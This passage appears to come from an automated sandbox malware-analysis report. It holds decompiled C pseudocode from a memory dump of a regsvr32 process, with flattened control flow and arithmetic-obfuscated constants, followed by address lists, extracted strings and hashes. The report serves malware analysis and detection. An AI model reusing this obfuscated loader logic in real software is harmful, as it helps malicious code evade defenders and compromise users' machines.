											_v336 = _v336 + 0xffff038b;
											_v336 = _v336 << 4;
											_v336 = _v336 ^ 0x061d483b;
											_v316 = 0x59219f;
											_v316 = _v316 + 0x1d67;
											_v316 = _v316 ^ 0x0057efa1;
											_v324 = 0xa6e059;
											_v324 = _v324 + 0xffffe1bb;
											_v324 = _v324 ^ 0x00a78908;
											_v332 = 0x97662a;
											_v332 = _v332 + 0xffff11a3;
											_v332 = _v332 + 0x95e8;
											_v332 = _v332 ^ 0x009c42f1;
											_t784 = E04F7C81E(_v336, __eflags, _v316, _v324, _v332, _t878, _t781, _v300 - _t878);
											_v332 = 0x9dfe93;
											_t919 = 0x22;
											_v332 = _v332 / _t919;
											_v332 = _v332 * 7;
											_v332 = _v332 ^ 0x00265a7e;
											_v336 = 0xbfe215;
											_v336 = _v336 * 0x64;
											_v336 = _v336 | 0x1d1516b0;
											_v336 = _v336 + 0xffff2303;
											_v336 = _v336 ^ 0x5ffd19f1;
											_v316 = 0x514a14;
											_v316 = _v316 >> 0xb;
											_v316 = _v316 ^ 0x000e24b7;
											_v324 = 0x583585;
											_v324 = _v324 + 0x44;
											_v324 = _v324 ^ 0x0055ae46;
											E04F6845B(_v332, _v336, _v316, _v324, _t781);
											_t921 = _v304;
											_t790 = _v308;
											_t880 = _t878 + _t784 - _t790;
											__eflags = _t880;
											 *_t921 = _t790;
											 *(_t921 + 4) = _t880;
										} else {
											__eflags = _t765 - 0xeddf3;
											if(_t765 != 0xeddf3) {
												goto L29;
											} else {
												_v328 = 0xf8ba5c;
												_v328 = _v328 + 0xf20e;
												_v328 = _v328 + 0x6d4b;
												_v300 = _t987 + _v308;
												_t922 = 0x7e;
												_push(0x4f61100);
												_v328 = _v328 * 0x1d;
												_v328 = _v328 ^ 0x1c529d32;
												_v336 = 0x61e98a;
												_v336 = _v336 + 0xffff59dc;
												_v336 = _v336 / _t922;
												_v336 = _v336 >> 4;
												_v336 = _v336 ^ 0x00059729;
												_t795 = E04F7B0A4(_v328, _v336);
												_v316 = 0xb4c735;
												_v316 = _v316 ^ 0x471e542d;
												_v316 = _v316 ^ 0x47a968e2;
												_v320 = 0xf3c42;
												_v320 = _v320 << 6;
												_v320 = _v320 | 0xa2802c45;
												_t924 = 0x2b;
												_v320 = _v320 * 0x54;
												_v320 = _v320 ^ 0xbff79473;
												_v328 = 0xa5b4da;
												_v328 = _v328 * 0x4a;
												_v328 = _v328 + 0xfffffad7;
												_v328 = _v328 << 0xe;
												_v328 = _v328 ^ 0x9076855b;
												_v324 = 0x219328;
												_v324 = _v324 + 0xffffaa12;
												_v324 = _v324 ^ 0x0027ffd8;
												_v336 = 0x4a7216;
												_v336 = _v336 >> 0xf;
												_v336 = _v336 * 0x3a;
												_v336 = _v336 / _t924;
												_v336 = _v336 ^ 0x00054f2c;
												_t804 = E04F6CA20(_v300 - _v308, __eflags,  &_v256,  &_v128,  &_v288, _v308, _v320, _v328, _v324, _t795, _v336);
												_v332 = 0x2497ac;
												_v332 = _v332 ^ 0x5ecff801;
												_v332 = _v332 ^ 0x5ee721b3;
												_t878 = _t804 + _v308;
												_v316 = 0x28d9a5;
												_t926 = 0x26;
												_v316 = _v316 / _t926;
												_v316 = _v316 ^ 0x000df8b7;
												_v324 = 0xe6a48b;
												_t927 = 0x19;
												_v324 = _v324 / _t927;
												_v324 = _v324 ^ 0x0003c2f9;
												_v336 = 0xbf987c;
												_t928 = 0x74;
												_v336 = _v336 / _t928;
												_v336 = _v336 ^ 0x6574b869;
												_v336 = _v336 + 0x72c0;
												_t560 =  &_v336;
												 *_t560 = _v336 ^ 0x6579cad1;
												__eflags =  *_t560;
												E04F6845B(_v332, _v316, _v324, _v336, _t795);
												_t996 =  &(_t996[0xd]);
												_t765 = 0x67bd3;
												L23:
												_t991 = _v292;
												while(1) {
													L1:
													_t884 = 0x44;
													goto L2;
												}
											}
										}
									}
								}
							}
							L33:
							return _t995;
						}
						if(_t1001 == 0) {
							_v320 = 0xe374cd;
							_v320 = _v320 >> 9;
							_v320 = _v320 ^ 0x3370b13e;
							_v320 = _v320 + 0xffff89d1;
							_v320 = _v320 ^ 0x33704a54;
							_v328 = 0x28cd3b;
							_v328 = _v328 >> 0xb;
							_v328 = _v328 | 0x47f682ed;
							_v328 = _v328 ^ 0x4a42cc5c;
							_v328 = _v328 ^ 0x0db44ba9;
							_v324 = 0x7b505;
							_v324 = _v324 << 4;
							_v324 = _v324 ^ 0x0076f384;
							_v332 = 0x5b4a64;
							_v332 = _v332 + 0xffff6f9b;
							_v332 = _v332 << 5;
							_v332 = _v332 ^ 0x0b57f259;
							_v336 = 0x6080d7;
							_t886 = 0xe;
							_push(_t886);
							_v336 = _v336 / _t886;
							_v336 = _v336 >> 0xe;
							_v336 = _v336 << 7;
							_v336 = _v336 ^ 0x000df05b;
							_t817 = E04F6F826(_v320, _t886, _v328);
							_v316 = 0xfb4ac6;
							_t987 = _t817;
							_v316 = _v316 + 0xffff19d9;
							_v316 = _v316 ^ 0x00f5e546;
							_v324 = 0x16a857;
							_v324 = _v324 + 0xffff8ae5;
							_v324 = _v324 ^ 0x00120103;
							_v320 = 0x222179;
							_t888 = 0x72;
							_v320 = _v320 * 0x2c;
							_v320 = _v320 + 0x1d43;
							_v320 = _v320 + 0xd223;
							_v320 = _v320 ^ 0x05d95603;
							_v328 = 0x47c7c3;
							_v328 = _v328 ^ 0xebbccfc6;
							_v328 = _v328 / _t888;
							_v328 = _v328 + 0xffff35dd;
							_v328 = _v328 ^ 0x0212fe6f;
							_v332 = 0x49a9ae;
							_v332 = _v332 + 0x768b;
							_v332 = _v332 >> 6;
							_v332 = _v332 ^ 0x00012888;
							_v336 = 0x43674e;
							_v336 = _v336 ^ 0x985b60ed;
							_v336 = _v336 ^ 0x52299220;
							_v336 = _v336 >> 7;
							_v336 = _v336 ^ 0x0194632a;
							_push(_v336 | _v332);
							_push(_v328);
							_push(_v320);
							_push(_t987);
							_push(_v324);
							E04F759FA( &_v288, _v316);
							_t996 =  &(_t996[8]);
							_t765 = 0x6a237;
							goto L1;
						} else {
							if(_t765 == 0x5e8df) {
								_v332 = 0xb47319;
								_t890 = 0x2e;
								_push(_t890);
								_v332 = _v332 / _t890;
								_v332 = _v332 ^ 0xcb8f80fa;
								_v332 = _v332 ^ 0xcb8c2cc7;
								_t987 = _v332;
								_v316 = 0x5e4ad6;
								_v316 = _v316 >> 4;
								_v316 = _v316 ^ 0x0006222c;
								_v324 = 0x3214;
								_v324 = _v324 | 0xa5c827ff;
								_v324 = _v324 ^ 0xa5c3b197;
								_t995 = E04F73EE6(_t890, _t987, __eflags);
								__eflags = _t995;
								if(__eflags != 0) {
									_t765 = 0xd28ed;
									while(1) {
										L1:
										_t884 = 0x44;
										goto L2;
									}
								}
							} else {
								if(_t765 == 0x67bd3) {
									_v332 = 0x658203;
									_v332 = _v332 ^ 0x30bb770a;
									_v332 = _v332 << 0xb;
									_v332 = _v332 ^ 0xf7a62362;
									_v328 = 0x74335e;
									_v328 = _v328 ^ 0x7797f37b;
									_v328 = _v328 + 0xaadd;
									_v328 = _v328 << 0xc;
									_v328 = _v328 ^ 0x46bde8ac;
									_v336 = 0xb0059b;
									_v336 = _v336 | 0x426c5388;
									_v336 = _v336 >> 2;
									_v336 = _v336 + 0xfca4;
									_v336 = _v336 ^ 0x10c52db3;
									E04F6C8F0(_t878, _v332, _v328,  *_t991,  *((intOrPtr*)(_t991 + 4)), _v336);
									_t996 =  &(_t996[4]);
									_t765 = 0xe3b57;
									_t878 = _t878 +  *((intOrPtr*)(_t991 + 4));
									while(1) {
										L1:
										_t884 = 0x44;
										goto L2;
									}
								} else {
									if(_t765 == 0x6a237) {
										_v320 = 0x31ad21;
										_t893 = 0x65;
										_push(_t893);
										_v320 = _v320 / _t893;
										_v320 = _v320 | 0xe9cee724;
										_v320 = _v320 ^ 0xe9ceffe9;
										_v324 = 0xc5ad7c;
										_v324 = _v324 << 6;
										_v324 = _v324 ^ 0x316b5f10;
										_v332 = 0x32e66b;
										_v332 = _v332 << 7;
										_v332 = _v332 + 0xfffffcb6;
										_v332 = _v332 ^ 0x1976680a;
										_v328 = 0x7fa8bd;
										_v328 = _v328 * 0x34;
										_v328 = _v328 + 0xffff7557;
										_v328 = _v328 << 0xc;
										_v328 = _v328 ^ 0xdbbe50d7;
										_v336 = 0x970f28;
										_v336 = _v336 + 0x2001;
										_v336 = _v336 | 0x48a69efd;
										_v336 = _v336 ^ 0x90ec184a;
										_v336 = _v336 ^ 0xd85c6a66;
										_t836 = E04F6F826(_v320, _t893, _v324);
										_v312 = 0xab326c;
										_t987 = _t836;
										_v312 = _v312 >> 8;
										_v312 = _v312 ^ 0x00092bd3;
										_v320 = 0xbb31e5;
										_t895 = 0x34;
										_v320 = _v320 / _t895;
										_v320 = _v320 | 0x52e3414c;
										_v320 = _v320 ^ 0x52e231e0;
										_v316 = 0x3ab1a1;
										_v316 = _v316 >> 0xf;
										_v316 = _v316 ^ 0x0005f4da;
										_v336 = 0x9f7845;
										_v336 = _v336 ^ 0x3e14a0f6;
										_v336 = _v336 ^ 0xd94e5fe1;
										_v336 = _v336 | 0xef31737a;
										_v336 = _v336 ^ 0xeff67629;
										_v328 = 0xf35ef1;
										_t896 = 0x1c;
										_v328 = _v328 / _t896;
										_v328 = _v328 + 0x6022;
										_v328 = _v328 ^ 0x00091134;
										_v324 = 0x8e62ff;
										_v324 = _v324 | 0xb22e5356;
										_v324 = _v324 ^ 0xb2ae73fe;
										_v332 = 0x23446d;
										_v332 = _v332 + 0xdecd;
										_v332 = _v332 >> 4;
										_v332 = _v332 ^ 0x00024231;
										_push(_v332 | _v324 | _v328);
										_push(_v336);
										_push(_v316);
										_push(_t987);
										_push(_v320);
										E04F759FA( &_v128, _v312);
										_t996 =  &(_t996[8]);
										_t765 = 0x881d2;
										while(1) {
											L1:
											_t884 = 0x44;
											goto L2;
										}
									} else {
										if(_t765 == 0x6d02a) {
											_v332 = 0x638436;
											_v332 = _v332 + 0xffff2096;
											_v332 = _v332 ^ 0x81c0702a;
											_v332 = _v332 ^ 0x81a165e3;
											_v336 = 0x659e3f;
											_v336 = _v336 << 0xd;
											_v336 = _v336 ^ 0xe1ed9e8b;
											_v336 = _v336 ^ 0xfd80c9c4;
											_v336 = _v336 ^ 0xafab19ed;
											_v324 = 0xf78991;
											_v324 = _v324 ^ 0xe9c2b156;
											_v324 = _v324 ^ 0xe9374c28;
											_t675 =  &_v332; // 0xe9374c28
											E04F7E4B2( *_t675, _v336, __eflags, _v324, _t995);
											_t995 = 0;
										} else {
											if(_t765 != 0x881d2) {
												goto L29;
											} else {
												_v336 = 0x83c5c;
												_v296 =  &_v256;
												_push(_t884);
												_v336 = _v336 * 0x76;
												_v336 = _v336 + 0xf4da;
												_v336 = _v336 + 0xffff8663;
												_v336 = _v336 ^ 0x03cc4dad;
												_v332 = 0x2ef7aa;
												_v332 = _v332 ^ 0xb3cddc4a;
												_v332 = _v332 << 0xe;
												_v332 = _v332 ^ 0xcaf80010;
												_v328 = 0x4fe242;
												_v328 = _v328 + 0x7177;
												_v328 = _v328 ^ 0x4130dc5c;
												_v328 = _v328 * 0x3e;
												_v328 = _v328 ^ 0xd569eae6;
												_v320 = 0x1206ee;
												_v320 = _v320 ^ 0x854b0d4f;
												_v320 = _v320 + 0xffff75f1;
												_v320 = _v320 << 0xe;
												_v320 = _v320 ^ 0x20631032;
												_v312 = 0xb430e3;
												_v312 = _v312 >> 0xd;
												_v312 = _v312 * 0xe;
												_v312 = _v312 ^ 0x83b6074f;
												_v312 = _v312 ^ 0x83bdb1bc;
												_t951 = E04F6F826(_v336, _t884, _v332);
												_t997 =  &(_t996[3]);
												if(_t951 != 0) {
													_t988 =  &_v256;
													_t910 = _t951 >> 1;
													_t874 = memset(_t988, 0x2d002d, _t910 << 2);
													asm("adc ecx, ecx");
													memset(_t988 + _t910, _t874, 0);
													_t997 =  &(_t997[6]);
													_v296 =  &_v256 + _t951 * 2;
												}
												_v328 = 0x62c580;
												_v328 = _v328 + 0xfffff7bd;
												_v328 = _v328 | 0x15b94f1a;
												_t902 = 0x16;
												_v328 = _v328 / _t902;
												_v328 = _v328 ^ 0x00ffd163;
												_v336 = 0xeee7b3;
												_v336 = _v336 << 6;
												_v336 = _v336 >> 9;
												_t903 = 0xd;
												_v336 = _v336 / _t903;
												_v336 = _v336 ^ 0x00024c02;
												_v312 = 0xec27a1;
												_v312 = _v312 >> 0xf;
												_v312 = _v312 >> 8;
												_v312 = _v312 ^ 0x0005b220;
												_v320 = 0x558228;
												_v320 = _v320 + 0xffff8d7b;
												_v320 = _v320 + 0x8d45;
												_v320 = _v320 ^ 0x005f3280;
												_v332 = 0x411e31;
												_t904 = 0x43;
												_push(_t904);
												_v332 = _v332 / _t904;
												_v332 = _v332 ^ 0x5fb8485d;
												_v332 = _v332 ^ 0x5fb94d5e;
												_t863 = E04F6F826(_v328, _t904, _v336);
												_v324 = 0xa82011;
												_t987 = _t863;
												_v324 = _v324 ^ 0x974a9fb8;
												_v324 = _v324 ^ 0x97e55306;
												_v312 = 0x648c0;
												_v312 = _v312 ^ 0x89113eb4;
												_v312 = _v312 + 0xffffeee4;
												_v312 = _v312 ^ 0x8912333f;
												_v320 = 0xb05024;
												_t906 = 0x39;
												_v320 = _v320 / _t906;
												_v320 = _v320 | 0x21ce0a26;
												_v320 = _v320 ^ 0x21c44903;
												_v328 = 0x1219d6;
												_v328 = _v328 ^ 0x071fe48d;
												_v328 = _v328 * 0x57;
												_v328 = _v328 + 0xffffb825;
												_v328 = _v328 ^ 0x65c1231b;
												_v316 = 0xd61eed;
												_v316 = _v316 + 0xffffabd5;
												_v316 = _v316 ^ 0x00d5caca;
												_v332 = 0xc156af;
												_v332 = _v332 + 0xffff7418;
												_v332 = _v332 >> 0x10;
												_v332 = _v332 ^ 0x000000c1;
												_v336 = 0xc8b999;
												_v336 = _v336 + 0xffff1705;
												_v336 = _v336 + 0xffff459d;
												_t907 = 0x1f;
												_v336 = _v336 / _t907;
												_v336 = _v336 ^ 0x00066c10;
												_push(_v336 | _v332 | _v316);
												_push(_v328);
												_push(_v320);
												_push(_t987);
												_push(_v312);
												E04F759FA(_v296, _v324);
												_t996 =  &(_t997[8]);
												_t765 = 0x5e8df;
												while(1) {
													L1:
													_t884 = 0x44;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						goto L33;
						L29:
						__eflags = _t765 - 0x1a5f1;
					} while (__eflags != 0);
					goto L33;
				}
			}

0x04f6e942
0x04f6e94b
0x04f6e94f
0x04f6e951
0x04f6e955
0x04f6e95a
0x04f6e95f
0x04f6e963
0x04f6e967
0x04f6e96f
0x04f6e96f
0x04f6e971
0x04f6e972
0x04f6e972
0x04f6e972
0x04f6e972
0x04f6e977
0x00000000
0x00000000
0x04f6f14d
0x04f6f152
0x04f6f4c9
0x04f6f4ce
0x04f6f4d6
0x04f6f4de
0x04f6f4e6
0x04f6f4eb
0x04f6f4f3
0x04f6f501
0x04f6f502
0x04f6f508
0x04f6f510
0x04f6f520
0x04f6f525
0x04f6f52a
0x04f6f52c
0x04f6f53a
0x04f6f53f
0x00000000
0x04f6f52e
0x04f6f52e
0x04f6e96f
0x04f6e96f
0x04f6e971
0x00000000
0x04f6e971
0x04f6e96f
0x04f6f158
0x04f6f158
0x04f6f15d
0x04f6f4bf
0x00000000
0x04f6f163
0x04f6f163
0x04f6f168
0x04f6f389
0x04f6f396
0x04f6f39f
0x04f6f3a3
0x04f6f3ab
0x04f6f3b3
0x04f6f3bb
0x04f6f3bf
0x04f6f3c7
0x04f6f3cf
0x04f6f3d4
0x04f6f3dc
0x04f6f3e4
0x04f6f3ec
0x04f6f409
0x04f6f41c
0x04f6f41d
0x04f6f41e
0x04f6f41f
0x04f6f42b
0x04f6f42d
0x04f6f435
0x04f6f43a
0x04f6f442
0x04f6f44a
0x04f6f452
0x04f6f45a
0x04f6f462
0x04f6f466
0x04f6f46e
0x04f6f476
0x04f6f47a
0x04f6f482
0x04f6f48a
0x04f6f48f
0x04f6f494
0x04f6f4ad
0x04f6f4b2
0x04f6f4b5
0x00000000
0x04f6f16e
0x04f6f16e
0x04f6f173
0x04f6f5c8
0x04f6f5d2
0x04f6f5d7
0x04f6f5df
0x04f6f5e7
0x04f6f5ef
0x04f6f5fa
0x04f6f5fd
0x04f6f602
0x04f6f606
0x04f6f60e
0x04f6f61e
0x04f6f623
0x04f6f62f
0x04f6f639
0x04f6f63e
0x04f6f64a
0x04f6f654
0x04f6f65c
0x04f6f664
0x04f6f66c
0x04f6f674
0x04f6f67c
0x04f6f684
0x04f6f68c
0x04f6f694
0x04f6f6af
0x04f6f6b4
0x04f6f6c6
0x04f6f6ca
0x04f6f6d3
0x04f6f6d7
0x04f6f6df
0x04f6f6ec
0x04f6f6f0
0x04f6f6f8
0x04f6f700
0x04f6f708
0x04f6f710
0x04f6f715
0x04f6f71d
0x04f6f725
0x04f6f72a
0x04f6f742
0x04f6f747
0x04f6f74e
0x04f6f752
0x04f6f752
0x04f6f754
0x04f6f756
0x04f6f179
0x04f6f179
0x04f6f17e
0x00000000
0x04f6f184
0x04f6f18a
0x04f6f192
0x04f6f19a
0x04f6f1a5
0x04f6f1b0
0x04f6f1b1
0x04f6f1b6
0x04f6f1ba
0x04f6f1c2
0x04f6f1ca
0x04f6f1d8
0x04f6f1dc
0x04f6f1e1
0x04f6f1f1
0x04f6f1f6
0x04f6f200
0x04f6f20a
0x04f6f212
0x04f6f21a
0x04f6f21f
0x04f6f22e
0x04f6f22f
0x04f6f233
0x04f6f23b
0x04f6f248
0x04f6f24c
0x04f6f254
0x04f6f259
0x04f6f261
0x04f6f269
0x04f6f271
0x04f6f279
0x04f6f281
0x04f6f28b
0x04f6f299
0x04f6f29f
0x04f6f2d2
0x04f6f2d7
0x04f6f2e1
0x04f6f2eb
0x04f6f2f3
0x04f6f2f7
0x04f6f305
0x04f6f308
0x04f6f30c
0x04f6f316
0x04f6f324
0x04f6f329
0x04f6f32f
0x04f6f337
0x04f6f343
0x04f6f347
0x04f6f34b
0x04f6f353
0x04f6f35b
0x04f6f35b
0x04f6f35b
0x04f6f373
0x04f6f378
0x04f6f37b
0x04f6f380
0x04f6f380
0x04f6e96f
0x04f6e96f
0x04f6e971
0x00000000
0x04f6e971
0x04f6e96f
0x04f6f17e
0x04f6f173
0x04f6f168
0x04f6f15d
0x04f6f75b
0x04f6f765
0x04f6f765
0x04f6e97d
0x04f6ef91
0x04f6ef9b
0x04f6efa0
0x04f6efa8
0x04f6efb0
0x04f6efb8
0x04f6efc0
0x04f6efc5
0x04f6efcd
0x04f6efd5
0x04f6efdd
0x04f6efe5
0x04f6efea
0x04f6eff2
0x04f6effa
0x04f6f002
0x04f6f007
0x04f6f00f
0x04f6f01d
0x04f6f020
0x04f6f021
0x04f6f025
0x04f6f02a
0x04f6f02f
0x04f6f04c
0x04f6f051
0x04f6f059
0x04f6f05b
0x04f6f065
0x04f6f06d
0x04f6f075
0x04f6f07d
0x04f6f085
0x04f6f094
0x04f6f095
0x04f6f099
0x04f6f0a1
0x04f6f0a9
0x04f6f0b1
0x04f6f0b9
0x04f6f0cb
0x04f6f0cf
0x04f6f0d7
0x04f6f0df
0x04f6f0e7
0x04f6f0ef
0x04f6f0f4
0x04f6f0fc
0x04f6f104
0x04f6f10c
0x04f6f114
0x04f6f119
0x04f6f129
0x04f6f12a
0x04f6f12e
0x04f6f132
0x04f6f133
0x04f6f13b
0x04f6f140
0x04f6f143
0x00000000
0x04f6e983
0x04f6e988
0x04f6ef14
0x04f6ef24
0x04f6ef27
0x04f6ef28
0x04f6ef2c
0x04f6ef34
0x04f6ef3c
0x04f6ef42
0x04f6ef4a
0x04f6ef4f
0x04f6ef57
0x04f6ef5f
0x04f6ef67
0x04f6ef7c
0x04f6ef7f
0x04f6ef81
0x04f6ef87
0x04f6e96f
0x04f6e96f
0x04f6e971
0x00000000
0x04f6e971
0x04f6e96f
0x04f6e98e
0x04f6e993
0x04f6ee85
0x04f6ee8f
0x04f6ee97
0x04f6ee9c
0x04f6eea4
0x04f6eeac
0x04f6eeb4
0x04f6eebc
0x04f6eec1
0x04f6eec9
0x04f6eed1
0x04f6eed9
0x04f6eede
0x04f6eee6
0x04f6eeff
0x04f6ef04
0x04f6ef07
0x04f6ef0c
0x04f6e96f
0x04f6e96f
0x04f6e971
0x00000000
0x04f6e971
0x04f6e999
0x04f6e99e
0x04f6ecb5
0x04f6ecc5
0x04f6ecc8
0x04f6ecc9
0x04f6eccd
0x04f6ecd5
0x04f6ecdd
0x04f6ece5
0x04f6ecea
0x04f6ecf2
0x04f6ecfa
0x04f6ecff
0x04f6ed07
0x04f6ed0f
0x04f6ed1c
0x04f6ed20
0x04f6ed28
0x04f6ed2d
0x04f6ed35
0x04f6ed3d
0x04f6ed45
0x04f6ed4d
0x04f6ed55
0x04f6ed72
0x04f6ed77
0x04f6ed7f
0x04f6ed81
0x04f6ed88
0x04f6ed90
0x04f6ed9e
0x04f6eda3
0x04f6eda9
0x04f6edb1
0x04f6edb9
0x04f6edc1
0x04f6edc6
0x04f6edce
0x04f6edd6
0x04f6edde
0x04f6ede6
0x04f6edee
0x04f6edf6
0x04f6ee02
0x04f6ee05
0x04f6ee09
0x04f6ee11
0x04f6ee19
0x04f6ee21
0x04f6ee29
0x04f6ee31
0x04f6ee39
0x04f6ee41
0x04f6ee46
0x04f6ee5a
0x04f6ee5b
0x04f6ee5f
0x04f6ee63
0x04f6ee64
0x04f6ee73
0x04f6ee78
0x04f6ee7b
0x04f6e96f
0x04f6e96f
0x04f6e971
0x00000000
0x04f6e971
0x04f6e9a4
0x04f6e9a9
0x04f6f550
0x04f6f558
0x04f6f560
0x04f6f568
0x04f6f570
0x04f6f578
0x04f6f57d
0x04f6f585
0x04f6f58d
0x04f6f595
0x04f6f59d
0x04f6f5a5
0x04f6f5b6
0x04f6f5ba
0x04f6f5c1
0x04f6e9af
0x04f6e9b4
0x00000000
0x04f6e9ba
0x04f6e9ba
0x04f6e9c6
0x04f6e9cf
0x04f6e9d0
0x04f6e9d4
0x04f6e9dc
0x04f6e9e4
0x04f6e9ec
0x04f6e9f4
0x04f6e9fc
0x04f6ea01
0x04f6ea09
0x04f6ea11
0x04f6ea19
0x04f6ea26
0x04f6ea2a
0x04f6ea32
0x04f6ea3a
0x04f6ea42
0x04f6ea4a
0x04f6ea4f
0x04f6ea57
0x04f6ea5f
0x04f6ea69
0x04f6ea6d
0x04f6ea75
0x04f6ea97
0x04f6ea99
0x04f6ea9e
0x04f6eaa2
0x04f6eaa6
0x04f6eaad
0x04f6eaaf
0x04f6eab1
0x04f6eab1
0x04f6eabb
0x04f6eabb
0x04f6eabf
0x04f6eac9
0x04f6ead1
0x04f6eadf
0x04f6eae4
0x04f6eaea
0x04f6eaf2
0x04f6eafa
0x04f6eaff
0x04f6eb08
0x04f6eb0d
0x04f6eb13
0x04f6eb1b
0x04f6eb23
0x04f6eb28
0x04f6eb2d
0x04f6eb35
0x04f6eb3d
0x04f6eb45
0x04f6eb4d
0x04f6eb55
0x04f6eb61
0x04f6eb64
0x04f6eb65
0x04f6eb69
0x04f6eb71
0x04f6eb8e
0x04f6eb93
0x04f6eb9b
0x04f6eb9d
0x04f6eba7
0x04f6ebaf
0x04f6ebb7
0x04f6ebbf
0x04f6ebc7
0x04f6ebcf
0x04f6ebdd
0x04f6ebe2
0x04f6ebe6
0x04f6ebee
0x04f6ebf6
0x04f6ebfe
0x04f6ec0b
0x04f6ec0f
0x04f6ec17
0x04f6ec1f
0x04f6ec27
0x04f6ec2f
0x04f6ec37
0x04f6ec3f
0x04f6ec47
0x04f6ec4c
0x04f6ec54
0x04f6ec5c
0x04f6ec64
0x04f6ec72
0x04f6ec79
0x04f6ec7d
0x04f6ec91
0x04f6ec92
0x04f6ec96
0x04f6ec9a
0x04f6ec9b
0x04f6eca3
0x04f6eca8
0x04f6ecab
0x04f6e96f
0x04f6e96f
0x04f6e971
0x00000000
0x04f6e971
0x04f6e96f
0x04f6e9b4
0x04f6e9a9
0x04f6e99e
0x04f6e993
0x04f6e988
0x00000000
0x04f6f540
0x04f6f540
0x04f6f540
0x00000000
0x04f6f54b

Strings

(, xrefs: 04F6F163
(L7, xrefs: 04F6F5B6
TJp3, xrefs: 04F6EFB0
D, xrefs: 04F6F725
(, xrefs: 04F6EF87
LDM, xrefs: 04F6F5C8
1R, xrefs: 04F6EDB1
Km, xrefs: 04F6F19A
y!", xrefs: 04F6F085
"`, xrefs: 04F6EE09
~Z&, xrefs: 04F6F6D7
^3t, xrefs: 04F6EEA4

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "`$(L7$D$Km$LDM$TJp3$^3t$y!"$~Z&$($($1R
API String ID: 0-1240641718
Opcode ID: 8c42123f7338da1d1d6730533c28380a89b6e3fa7d168896562607a185d7089a
Instruction ID: cc5ce153275bf58e1cc1ea862bcf8a21fa75f88eb78af26c3722c4c02e7c0254
Opcode Fuzzy Hash: 8c42123f7338da1d1d6730533c28380a89b6e3fa7d168896562607a185d7089a
Instruction Fuzzy Hash: BE720F725093429FC348CF25D58940BBBE1BBD8B58F104A1DF09AA6260D7B4DA4ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F701BF Relevance: 15.6, Strings: 12, Instructions: 634
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04F701BF(void* __ecx, void* __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				char _v2616;
				intOrPtr _v2620;
				char _v2624;
				intOrPtr _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				void* _t669;
				signed int _t680;
				signed int _t681;
				signed int _t685;
				void* _t705;
				void* _t731;
				void* _t749;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				signed int _t757;
				signed int _t765;
				signed int _t769;
				signed int _t778;
				signed int _t781;
				signed int _t782;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t788;
				signed int _t789;
				signed int _t841;
				void* _t848;
				signed int* _t850;
				void* _t856;

				_t850 =  &_v2652;
				_v2632 = 0x42454;
				_v2628 = 0xbd59d;
				_v2652 = 0x7ef012;
				_v2652 = _v2652 + 0xffff3bd9;
				_v2652 = _v2652 + 0xfffff117;
				_v2652 = _v2652 ^ 0x007cf30f;
				_v2648 = 0x8df853;
				_v2648 = _v2648 << 7;
				_v2648 = _v2648 ^ 0xe10adbb4;
				_v2648 = _v2648 ^ 0xa7f22282;
				_t848 = __ecx;
				_t841 = 0x92c5b;
				_t669 = E04F7D61E(__ecx);
				_t838 = _v2632;
				_t749 = _t669;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t856 = _t841 - 0x9eecb;
							if(_t856 <= 0) {
								break;
							}
							__eflags = _t841 - 0x9f7bc;
							if(_t841 == 0x9f7bc) {
								_v2652 = 0xd8cf4;
								_v2652 = _v2652 + 0xffff095a;
								_v2652 = _v2652 + 0xffffc333;
								_v2652 = _v2652 << 3;
								_v2652 = _v2652 ^ 0x0062e60f;
								_v2612 = E04F762FF();
								_v2632 = 0x89905a;
								_v2632 = _v2632 + 0x83ad;
								_v2632 = _v2632 ^ 0x008a1406;
								_v2644 = 0x74c31b;
								_v2644 = _v2644 ^ 0x2ec0a001;
								_v2644 = _v2644 ^ 0xca2a4cfb;
								_v2644 = _v2644 | 0xa75e6447;
								_v2644 = _v2644 ^ 0xe7d086ed;
								_v2652 = 0xcc13b1;
								_v2652 = _v2652 + 0xffffec89;
								_v2652 = _v2652 + 0xffff92d7;
								_v2652 = _v2652 * 0x37;
								_v2652 = _v2652 ^ 0x2bb719fd;
								_v2648 = 0x49366d;
								_v2648 = _v2648 * 0x5c;
								_v2648 = _v2648 + 0x5a1a;
								_v2648 = _v2648 ^ 0x1a49d498;
								_v2640 = 0x321914;
								_v2640 = _v2640 + 0x9da3;
								_v2640 = _v2640 << 4;
								_v2640 = _v2640 ^ 0x032b72ca;
								_v2608 = E04F7E40B(_v2644, _v2652, _v2648, _t672, _v2640) + _v2632 + E04F7E40B(_v2644, _v2652, _v2648, _t672, _v2640) + _v2632;
								_v2648 = 0x8e85e;
								_v2648 = _v2648 + 0x427e;
								_v2648 = _v2648 + 0xda2;
								_v2648 = _v2648 >> 0x10;
								_v2648 = _v2648 ^ 0x00100009;
								_v2640 = 0xf38ae1;
								_v2640 = _v2640 + 0xb659;
								_v2640 = _v2640 ^ 0x00fae3ad;
								_v2636 = 0xafa4db;
								_v2636 = _v2636 | 0x6c8688ec;
								_v2636 = _v2636 ^ 0x6ca65e24;
								_v2644 = 0x79e84e;
								_v2644 = _v2644 << 6;
								_v2644 = _v2644 * 0x4b;
								_v2644 = _v2644 >> 0xc;
								_v2644 = _v2644 ^ 0x000b0b05;
								_v2632 = 0x80fdf1;
								_v2632 = _v2632 + 0x959c;
								_v2632 = _v2632 ^ 0x008b69a8;
								_v2652 = 0xf74955;
								_v2652 = _v2652 + 0xffffab73;
								_v2652 = _v2652 + 0xd258;
								_v2652 = _v2652 + 0xfffffd61;
								_v2652 = _v2652 ^ 0x00f4aa1b;
